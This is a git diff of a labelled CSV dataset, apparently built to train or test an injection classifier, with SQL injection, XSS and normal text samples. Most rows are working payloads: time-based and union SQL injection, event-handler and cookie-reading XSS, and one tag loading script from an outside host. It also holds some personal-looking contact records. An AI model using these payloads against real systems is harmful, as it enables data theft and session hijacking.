diff --git "a/test.csv" "b/test.csv" --- "a/test.csv" +++ "b/test.csv" @@ -1,5281 +1,5417 @@ Payload,Label,text_label,ID -"1 ) ) as mmby where 3990 = 3990 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,16195 -"-4669"" or 8571 = 8571--",2,SQLi,13525 -1'+ ( select dpkp where 4836 = 4836 and sleep ( 5 ) ) +',2,SQLi,14205 -"1"" where 8734 = 8734",2,SQLi,14189 -I need to decide where to go for a coffee break.,0,normal,24125 -"1"" ) ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( ""lazm"" like ""lazm",2,SQLi,13495 - or 1=1 --,2,SQLi,10212 -"-8369"" ) ) union all select 2191--",2,SQLi,13387 -document.write,1,XSS,1784 -"end and ( ( ( ""memh"" like ""memh",2,SQLi,18254 -"1 ) and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( 4557 = 4557",2,SQLi,21776 -"1"" ) where 7950 = 7950 and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13320 -""">",1,XSS,644 -"",1,XSS,2339 -"",1,XSS,6933 -

,1,XSS,7095 -",s",2,SQLi,12077 -"1%"" ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ( ""%"" = """,2,SQLi,20695 -1' ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ),2,SQLi,15683 -"1'|| ( select 'akye' where 9242 = 9242 union all select null,null,null,null,null,null#",2,SQLi,21107 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17--",2,SQLi,10522 -1'|| ( select 'etvo' from dual where 1557 = 1557,2,SQLi,13477 -"test",1,XSS,2871 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))",2,SQLi,10755 -1 ) rlike sleep ( 5 ) #,2,SQLi,12622 -XSS,1,XSS,2585 -"XSS",1,XSS,1499 -"{""id"":null,""name"":""stream light""}",0,normal,26097 -"-7184 ) as fshx where 3408 = 3408 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,15145 -"1"" ) where 1212 = 1212 and 8475 = 5864",2,SQLi,20129 -,1,XSS,8819 -"test",1,XSS,3426 -Select your route.,0,normal,25014 -"test",1,XSS,3595 -or pg_sleep(__TIME__)--,2,SQLi,10155 -if ( 4907 = 9581 ) select 4907 else drop function apqw--,2,SQLi,21382 -"",1,XSS,7812 -"1%' ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( '%' = '",2,SQLi,14650 -Select this song.,0,normal,24983 -Aggregate data where applicable.,0,normal,23534 -"1"" ) ) as gprr where 5975 = 5975 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,22552 -"-8042 ) as zhoq where 2120 = 2120 union all select 2120,2120,2120,2120,2120,2120,2120,2120,2120,2120--",2,SQLi,18410 -,1,XSS,2096 -"-1287"" ) as bbzg where 1475 = 1475 union all select 1475,1475,1475,1475,1475,1475,1475,1475,1475#",2,SQLi,17949 -Filter the results.,0,normal,23017 -"
test
",1,XSS,6071 -"",1,XSS,1145 -1'|| ( select 'hafu' where 6226 = 6226,2,SQLi,16362 -1' ) ) as hzbj where 1725 = 1725 or sleep ( 5 ) #,2,SQLi,16206 -"AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( table_name ) FROM ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables ) WHERE LIMIT = 6 ) ) AND 'i' = 'i",2,SQLi,11820 -Select your pledge.,0,normal,25134 -<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>,1,XSS,1358 -XSS,1,XSS,4519 -"<LAYER SRC=\""http://ha.ckers.org/scriptlet.html\""></LAYER>",1,XSS,937 -Create a new playlist.,0,normal,22808 -"-5313' ) union all select 7187,7187,7187#",2,SQLi,13091 -"{""id"":null,""firstName"":""Cristalle"",""lastName"":""Wang"",""address"":""732 W 2ND ST, TIFTON GA 31794"",""city"":""840"",""telephone"":""5149157016""}",0,normal,26062 -1' ) ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( 'hgtg' = 'hgtg,2,SQLi,13297 -"",1,XSS,7785 -1' ) as dpmh where 5281 = 5281 and 2006 = 2006,2,SQLi,22168 -"1%' ) ) ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,18028 -"1'|| ( select 'ejuu' from dual where 2903 = 2903 and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) ) ||'",2,SQLi,14005 -"",1,XSS,2681 -"test",1,XSS,3979 -1%' ) ) ) or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and ( ( ( '%' = ',2,SQLi,17016 -Update your profile details.,0,normal,22886 -"1 or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) )",2,SQLi,19644 -"-4127%' union all select 9558,9558,9558#",2,SQLi,21663 -create table myfile (input TEXT); load data infile '' into table myfile; select * from myfile;,2,SQLi,22660 -select ( case when ( 3076 = 3596 ) then 3076 else 3076* ( select 3076 from mysql.db ) end ) #,2,SQLi,13067 -1 where 4985 = 4985 order by 1#,2,SQLi,22560 -Determine conditions where needed.,0,normal,23461 -XSS,1,XSS,4540 -"select * from users where id = '1' + @ @1 union select 1,version ( ) -- 1'",2,SQLi,11866 -"<;<;SCRIPT>;alert("";XSS"";);//<;<;/SCRIPT>;",1,XSS,1603 -"{""id"":null,""name"":""Greenland Dog""}",0,normal,25568 -"",1,XSS,8040 -select ( case when ( 7005 = 7118 ) then 1 else 7005* ( select 7005 from master..sysdatabases ) end ) --,2,SQLi,14672 -"inurl:"".php?q=""",1,XSS,9381 -select case when 5346 = 8272 then 1 else null end--,2,SQLi,17389 -"test",1,XSS,4743 -Update your profile with the new picture.,0,normal,23086 -"1' ) union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,16186 -"test",1,XSS,5231 -1' ) ) ) and 5615 = 5458--,2,SQLi,13813 -Where is the schema defined?,0,normal,23654 -<SCRIPT>alert('XSS');</SCRIPT>,1,XSS,968 -"",1,XSS,5955 -"\"";document.vulnerable=true;;//",1,XSS,1430 -"",1,XSS,5389 -"1' ) ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ( ( 'mbxh' like 'mbxh",2,SQLi,20444 -"1' ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )",2,SQLi,14193 -select sleep ( 5 ) and ( 4863 = 4863,2,SQLi,19070 -"1'|| ( select 'qrle' from dual where 9239 = 9239 or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) ) ||'",2,SQLi,19352 -"select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( 'oskf' like 'oskf",2,SQLi,19203 -"
test
",1,XSS,2236 -1' ) as uaoz where 2464 = 2464,2,SQLi,17134 -""">",1,XSS,8981 -"\\"";alert('XSS');//",1,XSS,928 -"test",1,XSS,8613 -"1' ) where 9454 = 9454 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,19354 -Index columns where valid.,0,normal,23496 -1' ) ) waitfor delay '0:0:5' and ( ( 'jcfe' = 'jcfe,2,SQLi,20716 -,1,XSS,6704 -"-4522"" ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ""mbkq"" = ""mbkq",2,SQLi,14864 -else,0,normal,23334 -"1 where 6119 = 6119 or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,17974 -Where's the barber shop?,0,normal,23797 -1' ) where 4509 = 4509 union all select null--,2,SQLi,19037 -"test",1,XSS,8470 -,1,XSS,1730 -"1%"" ) ) union all select null,null#",2,SQLi,15094 -"test",1,XSS,421 -"",1,XSS,1819 -"var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)#",1,XSS,9051 -") AND ELT(1337=1337,SLEEP(5)) AND (1337"" LIKE ""1337",2,SQLi,11344 -"
test
",1,XSS,5145 -",1,XSS,5909 -"-6942' ) union all select 7280,7280,7280#",2,SQLi,16697 -"",1,XSS,8490 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30",2,SQLi,10565 -"{""id"":null,""name"":""Tepig""}",0,normal,25599 -"<STYLE TYPE=\""text/javascript\"">alert('XSS');</STYLE>",1,XSS,964 -"1"" or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ""uosc"" = ""uosc",2,SQLi,15785 -">',1,XSS,822 -"
",1,XSS,2154 -"1"" ) where 9115 = 9115",2,SQLi,18476 -select ( case when ( 2783 = 9216 ) then 1 else 2783* ( select 2783 from master..sysdatabases ) end ) --,2,SQLi,18232 -Fetch records where available.,0,normal,23497 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))",2,SQLi,10758 -"1%"" ) ) ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( ( ( ""%"" = """,2,SQLi,21737 -,1,XSS,8526 -"",1,XSS,286 -Select taxi.,0,normal,24889 --4572' ) union all select 3520--,2,SQLi,17824 -Carefully select the colors.,0,normal,24510 -"1%' or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and '%' = '",2,SQLi,18753 -"-9566%"" ) union all select 7973,7973,7973,7973--",2,SQLi,14990 -"test",1,XSS,2961 --7444 ) ) ) or 1342 = 9774,2,SQLi,22279 -//INJECTX,1,XSS,9906 -"select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ( ( ( '%' = '",2,SQLi,14094 -"iif ( 5571 = 4947,1,1/0 )",2,SQLi,16867 -coalesce,0,normal,23377 -"{""id"":null,""name"":""strip""}",0,normal,25872 -"1%"" ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( ""%"" = """,2,SQLi,20267 -1'|| ( select 'yuku' where 7480 = 7480,2,SQLi,14405 -"-1106' ) ) union all select 2855,2855,2855,2855,2855,2855,2855#",2,SQLi,17414 -1'+ ( select 'mquh' where 3933 = 3933,2,SQLi,14538 -"1' ) as hlbq where 2347 = 2347 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,18905 -"
test",1,XSS,408 -"1' ) ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( ( 'fvbv' = 'fvbv",2,SQLi,21027 -XSS,1,XSS,35 -"1' ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( 'zypa' = 'zypa",2,SQLi,14121 -select ( case when ( 8978 = 1426 ) then 1 else 8978* ( select 8978 from master..sysdatabases ) end ) --,2,SQLi,14844 -"
drag me
drop here",1,XSS,8887 -"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and ( 'nslo' like 'nslo",2,SQLi,20954 -?scriptualert(EXSSE)?/scriptu,1,XSS,1677 -Select send.,0,normal,24881 -"test",1,XSS,7325 -"select * from users where id = 1 or ""$&"" or 1 = 1 -- 1",2,SQLi,11547 -Let's decide where to go for our anniversary.,0,normal,24014 -"-5507' or elt ( 1032 = 1032,3623 ) and 'ndqw' = 'ndqw",2,SQLi,19677 -"",1,XSS,7661 -"1"" ) ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( ( ""prtf"" like ""prtf",2,SQLi,20678 -,1,XSS,4700 -"Select, don't hesitate.",0,normal,24973 -"1' or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and 'eomt' = 'eomt",2,SQLi,13792 -"
    test
",1,XSS,6312 -"{""id"":null,""firstName"":""Kirin"",""lastName"":""Swatan"",""address"":"" 2 KALLANG AVENUE, #02-152A"",""city"":""513"",""telephone"":""2686692741""}",0,normal,25720 -"",1,XSS,9300 -feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//

,1,XSS,9368 -"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23",2,SQLi,11029 -"test",1,XSS,5289 -1 where 7802 = 7802,2,SQLi,16589 -"test",1,XSS,6527 -1 and 1 = 1,2,SQLi,11617 -"",1,XSS,8365 -"-8976%"" ) ) ) union all select 5146,5146,5146,5146,5146,5146,5146,5146--",2,SQLi,18516 -"{""id"":null,""name"":""student having""}",0,normal,25752 -Select the ideal candidate.,0,normal,24476 -"-1000"" or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ""isbq"" = ""isbq",2,SQLi,22282 -"",1,XSS,32 -1%' ) ) ) and sleep ( 5 ) #,2,SQLi,14183 -"",1,XSS,7617 -"
",1,XSS,6361 -select ( case when ( 8601 = 1220 ) then 8601 else 8601* ( select 8601 from mysql.db ) end ) #,2,SQLi,21653 -"1' ) ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( 'ckfn' like 'ckfn",2,SQLi,19760 -"1%' union all select null,null,null,null#",2,SQLi,19706 -"test",1,XSS,2560 -"1%' ) ) and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,17477 -"1"" where 3227 = 3227 waitfor delay '0:0:5'--",2,SQLi,13596 -"test",1,XSS,4773 -"select * from users where id = '1' + @ 1! union select 1,version ( ) -- 1'",2,SQLi,12146 -,1,XSS,1854 -"",1,XSS,2453 -"",1,XSS,1238 -"&&javascript:alert(1)&&;&&<&&/script&&>",1,XSS,736 --2504' ) ) ) or 8723 = 9715,2,SQLi,17749 -",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* -,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,22698 -"1%"" ) ) and 2006 = 2006",2,SQLi,13607 -"1"" ) ) ) union all select null,null,null,null,null,null,null,null#",2,SQLi,14004 -inurl:scrapbook.php?­id=,1,XSS,9401 -"",1,XSS,9609 --7552 or 6872 = 6872,2,SQLi,20967 -"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23",2,SQLi,11035 -"test",1,XSS,6301 -
XSS
,1,XSS,6310 -"1' ) ) ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( ( ( 'cimm' like 'cimm",2,SQLi,12787 -"
test
",1,XSS,1941 -

,1,XSS,5688 -"/> -/>",1,XSS,8920 -"-2862' ) ) ) union all select 6649,6649--",2,SQLi,18587 -"",1,XSS,2856 -,1,XSS,3931 -"
test
",1,XSS,7603 -select ( case when ( 3863 = 1151 ) then 3863 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,12824 -XSS,1,XSS,8311 -"
test
",1,XSS,4635 -1' ) rlike sleep ( 5 ) and ( 'tslp' = 'tslp,2,SQLi,13434 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11",2,SQLi,10546 -""">>""><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->""></script><script>alert(1)</script>""><img/id=""confirm&lpar;1)""/alt=""/""src=""/""onerror=eval(id&%23x29;>'""><img src=""http://i.imgur.com/P8mL8.jpg"">",1,XSS,9603 -1' ) ) as zqeg where 4729 = 4729 and ( 1098 = 9682 ) *9682--,2,SQLi,15134 -"{""id"":null,""firstName"":""Yap"",""lastName"":""Chin"",""address"":""146 EAST FIRST AVE, WILLIAMSON WV 25661"",""city"":""475"",""telephone"":""5079823086""}",0,normal,25403 -*|,2,SQLi,12172 -"1"" where 2035 = 2035 and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) --",2,SQLi,12802 -"<blink onmouseenter=""alert(1)"">test</blink>",1,XSS,7410 -"<IMG SRC=""jav&#x0D;ascript:alert(<WBR>'XSS');"">",1,XSS,1644 -1' ) ) and 4650 = 1322#,2,SQLi,18464 -"<colgroup onkeypress=""alert(1)"" contenteditable>test</colgroup>",1,XSS,4809 -"1' ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( 'rqyz' = 'rqyz",2,SQLi,13700 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18",2,SQLi,10465 -"1"" ) ) ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( ( ( ""pnsz"" like ""pnsz",2,SQLi,19237 -1' ) ) as pdrg where 5960 = 5960 and 9198 = 9198--,2,SQLi,19640 --7435' ) where 6242 = 6242 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) --,2,SQLi,20940 -1' in boolean mode ) and 4457 = 3885#,2,SQLi,20653 -"{""id"":null,""firstName"":""Reign"",""lastName"":""Hc"",""address"":""177 MAIN STREET, LITTLETON NH 03561"",""city"":""654"",""telephone"":""2908989161""}",0,normal,25897 --6802 ) as coyv where 5693 = 5693 or 8571 = 8571--,2,SQLi,21218 -<hr id=x tabindex=1 onfocusin=alert(1)></hr>,1,XSS,7205 -Insert fresh batteries into the remote control.,0,normal,23098 -"-5170' ) ) as ovbf where 4833 = 4833 union all select 4833,4833,4833,4833--",2,SQLi,15536 -"<title onmouseup=""alert(1)"">test</title>",1,XSS,6283 -"-9923%' ) ) ) union all select 8985,8985,8985,8985,8985,8985,8985#",2,SQLi,18712 -Let's choose a location for the party.,0,normal,24134 -"-3604' ) as fyev where 7259 = 7259 union all select 7259,7259,7259,7259--",2,SQLi,18697 -"1'+ ( select 'mikf' where 5814 = 5814 or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,16885 -Select breakfast.,0,normal,24682 -"<main onclick=""alert(1)"">test</main>",1,XSS,7489 -"1' ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ( 'jnmf' = 'jnmf",2,SQLi,20389 -1 ) or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --,2,SQLi,20212 -"AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i",2,SQLi,11163 -Sort the alphabet letters.,0,normal,22954 -"1"" ) as advz where 5166 = 5166 or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14676 -"<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script>#",1,XSS,9283 -"<wbr onmouseleave=""alert(1)"">test</wbr>",1,XSS,3949 -"),NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,10907 -1%' ) order by 1--,2,SQLi,12294 -"-2790%"" ) union all select 5070,5070#",2,SQLi,20282 -"-9289 ) ) or make_set ( 5101 = 9919,9919 ) and ( ( 8977 = 8977",2,SQLi,15135 -"1"" ) ) ) and ( 3020 = 3020 ) *6703 and ( ( ( ""krxy"" = ""krxy",2,SQLi,21950 -1' ) ) as bbdf where 1327 = 1327,2,SQLi,16861 -<marquee id=x tabindex=1 onactivate=alert(1)></marquee>,1,XSS,8247 -"1 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,13593 -"1"" ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ""dbxi"" like ""dbxi",2,SQLi,20476 -"<style>@keyframes x{}</style><output style=""animation-name:x"" onanimationstart=""alert(1)""></output>",1,XSS,8715 -"<q draggable=""true"" ondragstart=""alert(1)"">test</q>",1,XSS,5599 -&&SLEEP(5),2,SQLi,10430 -"1' in boolean mode ) and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13758 --9340 ) where 5462 = 5462 or 3038 = 3038,2,SQLi,18765 -"{""id"":null,""name"":""pile now""}",0,normal,26010 -; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >,2,SQLi,11191 -"1' and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,15378 -<svg/onload=alert('XSS')>,1,XSS,258 -"<style>:target {color: red;}</style><dfn id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></dfn>",1,XSS,3618 -<tfoot id=x tabindex=1 ondeactivate=alert(1)></tfoot><input id=y autofocus>,1,XSS,8591 -1' and sleep ( 5 ),2,SQLi,14498 --8878' in boolean mode ) union all select 7785#,2,SQLi,21361 -"-2430' ) union all select 5712,5712,5712,5712,5712,5712,5712,5712,5712,5712--",2,SQLi,21471 -"1'|| ( select 'gopc' where 7386 = 7386 and make_set ( 9375 = 7963,7963 ) ) ||'",2,SQLi,21626 -<svg><fieldset onload=alert(1)></fieldset>,1,XSS,4705 -"-5802' ) ) ) union all select 6286,6286,6286,6286#",2,SQLi,16326 -"1"" ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ""kzcd"" = ""kzcd",2,SQLi,21394 -"<template oncut=""alert(1)"" contenteditable>test</template>",1,XSS,7569 -<head onpointermove=alert(1)>XSS</head>,1,XSS,3753 -"1%"" or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ""%"" = """,2,SQLi,22230 -"1"" ) as nraw where 7984 = 7984 and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,21574 -waitfor delay '0:0:5' and 'dfzn' = 'dfzn,2,SQLi,13025 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25",2,SQLi,10560 -; exec xp_regread,2,SQLi,10221 -"{""id"":null,""firstName"":""Adrian"",""lastName"":""San"",""address"":""Midpoint Orchard #01-08, 220 Orchard Road,"",""city"":""545"",""telephone"":""6464118800""}",0,normal,25889 -<track id=x tabindex=1 onbeforeactivate=alert(1)></track>,1,XSS,5351 -"<script onbeforepaste=""alert(1)"" contenteditable>test</script>",1,XSS,2042 -"select * from users where id = 1 or "";]"" or 1 = 1 -- 1",2,SQLi,11831 -or 'whatever' in ('whatever'),2,SQLi,10158 -1' ) ) ) rlike sleep ( 5 ) and ( ( ( 'zwyx' = 'zwyx,2,SQLi,19107 -1' where 7725 = 7725 or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,19436 -or pg_SLEEP(5)--,2,SQLi,10424 -"<applet onmousemove=""alert(1)"">test</applet>",1,XSS,6599 -"-3703"" ) ) ) union all select 3293,3293,3293,3293,3293,3293,3293,3293,3293,3293#",2,SQLi,14817 -"1"" ) ) as klie where 2840 = 2840 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,12275 -"-7240' ) ) union all select 8064,8064,8064#",2,SQLi,15307 -"and 0=benchmark(3000000,MD5(1))%20/*",2,SQLi,11069 -"<style>:target {color:red;}</style><code id=x style=""transition:color 1s"" ontransitionend=alert(1)></code>",1,XSS,8406 -Select dislike.,0,normal,24925 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#",2,SQLi,10583 -1' ) ) ) and 2542 = 7042--,2,SQLi,22483 -"-6870"" ) as deox where 8198 = 8198 union all select 8198#",2,SQLi,22076 -1'+ ( select zmbu where 8685 = 8685 rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) ) +',2,SQLi,16717 -"1' ) ) ) union all select null,null,null,null,null,null,null--",2,SQLi,16281 -1' ) and sleep ( 5 ) #,2,SQLi,17312 -"<code onkeydown=""alert(1)"" contenteditable>test</code>",1,XSS,2189 -"-9496 ) ) ) or elt ( 7511 = 3951,3951 ) and ( ( ( 3514 = 3514",2,SQLi,16939 -Where's the hiking trail?,0,normal,23777 -"{""id"":null,""firstName"":""Benson"",""lastName"":""Tan"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25316 -"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23",2,SQLi,11041 -"<article onmousemove=""alert(1)"">test</article>",1,XSS,3195 -"1',iif ( 6625 = 6625,1,1/0 )",2,SQLi,22600 -"1' ) ) ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( ( ( 'sjxp' like 'sjxp",2,SQLi,22342 -[citelol]: (javascript:prompt(document.cookie)),1,XSS,9441 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14#",2,SQLi,10666 -<time onpointerenter=alert(1)>XSS</time>,1,XSS,4230 -"1' ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ( 